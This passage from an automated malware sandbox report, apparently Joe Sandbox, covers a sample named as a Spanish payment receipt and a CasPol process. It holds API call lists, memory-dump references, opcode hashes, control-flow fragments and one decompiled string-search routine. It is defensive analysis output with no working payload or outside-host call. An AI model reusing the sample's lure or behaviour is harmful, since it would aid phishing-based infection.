                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                        • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                        • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                        • GlobalFree.KERNEL32(?), ref: 10001203
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405CB6(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                        				int _v8;
                                        				int _t12;
                                        				int _t14;
                                        				int _t15;
                                        				CHAR* _t17;
                                        				CHAR* _t27;
                                        
                                        				_t12 = lstrlenA(_a8);
                                        				_t27 = _a4;
                                        				_v8 = _t12;
                                        				while(lstrlenA(_t27) >= _v8) {
                                        					_t14 = _v8;
                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                        					_t15 = lstrcmpiA(_t27, _a8);
                                        					_t27[_v8] =  *(_t14 + _t27);
                                        					if(_t15 == 0) {
                                        						_t17 = _t27;
                                        					} else {
                                        						_t27 = CharNextA(_t27);
                                        						continue;
                                        					}
                                        					L5:
                                        					return _t17;
                                        				}
                                        				_t17 = 0;
                                        				goto L5;
                                        			}









                                        0x00405cc6
                                        0x00405cc8
                                        0x00405ccb
                                        0x00405cf7
                                        0x00405cd0
                                        0x00405cd9
                                        0x00405cde
                                        0x00405ce9
                                        0x00405cec
                                        0x00405d08
                                        0x00405cee
                                        0x00405cf5
                                        0x00000000
                                        0x00405cf5
                                        0x00405d01
                                        0x00405d05
                                        0x00405d05
                                        0x00405cff
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
                                        • CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                        • Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
                                        • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                        • Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:4.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:2
                                        Total number of Limit Nodes:0
                                        execution_graph 14316 360acf88 DuplicateHandle 14317 360ad01e 14316->14317

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 630 360acf80-360acf86 632 360acf88-360ad01c DuplicateHandle 630->632 633 360ad01e-360ad024 632->633 634 360ad025-360ad042 632->634 633->634
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360AD00F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6893439618.00000000360A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_360a0000_CasPol.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 0328c52a95357330cc93c1bddd682fb536216f7cca6c51c613b6f2b00ce088c4
                                        • Instruction ID: 5662ef94407010c8243287c5e0e116739408283b92913b51ecbdfa802a4f7162
                                        • Opcode Fuzzy Hash: 0328c52a95357330cc93c1bddd682fb536216f7cca6c51c613b6f2b00ce088c4
                                        • Instruction Fuzzy Hash: 072142B58003489FEB00CFAAD984ADEBFF4EB49350F11805AE854A7311D338A945CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 637 360acf88-360ad01c DuplicateHandle 638 360ad01e-360ad024 637->638 639 360ad025-360ad042 637->639 638->639
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360AD00F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6893439618.00000000360A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_360a0000_CasPol.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: b0b983a5914f4ce35199dd6f0219dff483f137cfad02395887d6c663632be40b
                                        • Instruction ID: a67322a8fd81f2e098355f91bf2b4cb79efc8efb14fe78afc79c5caea0dadb54
                                        • Opcode Fuzzy Hash: b0b983a5914f4ce35199dd6f0219dff483f137cfad02395887d6c663632be40b
                                        • Instruction Fuzzy Hash: 6C21E2B59003499FDB10CFAAD984ADEFBF4EF48310F14845AE958A7351D378A940CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8495fa514d803be067f0a6370565abe1f873afb0682266d96d33845e3360304b
                                        • Instruction ID: d02595b627d524f8d0b8f7699e547e59b55836587adfb333ed48a3288768d626
                                        • Opcode Fuzzy Hash: 8495fa514d803be067f0a6370565abe1f873afb0682266d96d33845e3360304b
                                        • Instruction Fuzzy Hash: DB21F475605300DFEB00DF94DAC1F16BB62FB84364F25C569E8494F246C336E416CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44f7e0357618276b162318cf21690141ed5ba17ac069af83b75544b4e6624dc1
                                        • Instruction ID: 6939dc2127052fd54a790ed4c8af3e0fd44ab4cb079998e09321f08678fdc6a1
                                        • Opcode Fuzzy Hash: 44f7e0357618276b162318cf21690141ed5ba17ac069af83b75544b4e6624dc1
                                        • Instruction Fuzzy Hash: AD213775605300EFFB01CF94DAC1F06BF66FB88368F2581A9E8454B246C736D856CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892408651.0000000035E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e4d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7189c0a767af8470b03dc88ec0df67093c863d8b33bde96e4349cc2e2089fd1
                                        • Instruction ID: 2ee99b856ecf75516fcf211a35306765c507b2cbbf4ea2050ddb0251caf12ba2
                                        • Opcode Fuzzy Hash: d7189c0a767af8470b03dc88ec0df67093c863d8b33bde96e4349cc2e2089fd1
                                        • Instruction Fuzzy Hash: 6621F5B5604340DFFB04CF64EA84F26BB66FB84314F66C5A9D8494B246C77AD807CA61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c40d70f6c68fc962210a97bff005cd598473ecea83309f31aa1d372a0f9c5f2
                                        • Instruction ID: a9a4635242890d116905d48cc65eb3217c11a0913d7d15d952392a32991b71f9
                                        • Opcode Fuzzy Hash: 1c40d70f6c68fc962210a97bff005cd598473ecea83309f31aa1d372a0f9c5f2
                                        • Instruction Fuzzy Hash: DD11D376505240DFEB01CF50D6C4B06BF72FB84324F24C6A9D8494F656C33AE456CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c40d70f6c68fc962210a97bff005cd598473ecea83309f31aa1d372a0f9c5f2
                                        • Instruction ID: 198422ee8a34d66ad7ba70833db2610cd90a788cf409c916fdb01ca514e9481c
                                        • Opcode Fuzzy Hash: 1c40d70f6c68fc962210a97bff005cd598473ecea83309f31aa1d372a0f9c5f2
                                        • Instruction Fuzzy Hash: 3011E676505240DFEB02CF50D6C4B06BF72FB84368F24C6A9DC490B256C33AD456CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892408651.0000000035E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e4d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c2f39641c160b7897ebea8e8b80f364f6b3776aed05d422f8d74a4362a24b5a
                                        • Instruction ID: e02c0e2cadc78c80f5fb3450410f58942f05291f9983821404af6d591d59e769
                                        • Opcode Fuzzy Hash: 4c2f39641c160b7897ebea8e8b80f364f6b3776aed05d422f8d74a4362a24b5a
                                        • Instruction Fuzzy Hash: E611D0B9504280CFEB01CF50E6C4B16FB62FB84318F25C6ADD8494B656C33AD40BCB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63ec136d0db1e0720db59e6c2534c9db44a403961909da65d33ffa8dd27b4015
                                        • Instruction ID: 85bcdb7e631e9f93a067eda8848000d8a940a14e5a71191533fdd9fdba78d8c9
                                        • Opcode Fuzzy Hash: 63ec136d0db1e0720db59e6c2534c9db44a403961909da65d33ffa8dd27b4015
                                        • Instruction Fuzzy Hash: C8017BB000A3809FF3008A55CE80B57FFA8EF806E8F05852AEC5C4A282D7799840CA72
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.6892160215.0000000035E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_35e3d000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ee36e062bee8d931c5381c08f74d3fc353485c64b34bd52a490215ee4daf4e5
                                        • Instruction ID: ae20bb4693be5e90e8019e843aa39863ad454b69152c8bd68a53df9582a87896
                                        • Opcode Fuzzy Hash: 1ee36e062bee8d931c5381c08f74d3fc353485c64b34bd52a490215ee4daf4e5
                                        • Instruction Fuzzy Hash: C0F0C2B10053409EF7108A16DD84B63FFA8EF81668F14C55AED5C0A286C3799840CAB2
                                        Uniqueness

                                        Uniqueness Score: -1.00%